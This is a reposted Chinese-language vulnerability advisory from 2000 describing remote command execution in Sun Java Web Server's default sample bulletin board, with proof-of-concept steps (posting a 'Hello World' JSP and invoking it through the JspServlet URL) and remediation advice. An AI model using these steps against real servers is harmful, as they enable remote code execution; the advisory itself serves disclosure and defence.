三度网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

Sun Java Web服务器远程可执行命令漏洞

时间:2024/6/11作者:未知来源:三度网教程人气:


Sun Java Web服务器远程可执行命令漏洞



漏洞发布时间:2000-7-13 17:41:00
漏 洞 描 述:

在Solaris and Windows NT的Sun Java Web Server默认安装设置下。通过公告版的样板程序的漏洞,可以远程执行任意命令。

漏洞测试方法如下:

下面的例子将显示如何上载和执行该代码,而在服务器上显示"Hello World"。

输入下面的JSP代码将打印出"Hello World":

<% String s="Hello World"; %>
<%=s %>

通过下面的公告版连接Post这段代码:

http://jws.site/examples/applications/bboard/bboard_frames.html

检验是否该代码真正的上载了:

http://jws.site/board.html

通过执行下面的连接编译和执行该代码:

http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html

解 决 方 法:

仔细按照Java Web Server手册中的"How to secure a web site that uses the Java Web Server" 一章进行设置,或者参考下面连接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者简单的移除默认安装的这些样板文件。





关键词:  Sun  Java  Web服务器远程可执行命令漏洞





Copyright © 2012-2018 三度网教程(http://www.3du8.cn) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版